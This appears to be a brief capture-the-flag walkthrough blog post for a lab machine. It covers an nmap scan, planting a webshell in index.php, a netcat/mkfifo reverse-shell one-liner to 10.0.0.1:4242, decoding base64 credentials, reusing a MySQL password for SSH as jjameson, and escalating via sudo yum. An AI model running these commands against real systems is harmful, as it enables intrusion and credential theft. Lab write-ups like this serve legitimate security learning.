Let's Start !!!First Start with the nmap scan. "nmap -sV -A -oN nmap/initial $IP -vv"
Log in to the website wtih the password & add a webshell in the index.php file. Now use the webshell to get reverse shell. "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 4242 >/tmp/f" But beforing using it encode it using url encoder.
If You open that file you will find some base64 codes. After decoding it you will see some interesting creds. You will find the password of root's mysql server, but it's also the ssh password of jjameson. 'sudo -l' You will see that you can run 'yum' as sudo.
Finished !!!!! :)
0 Comments
Leave a Reply. |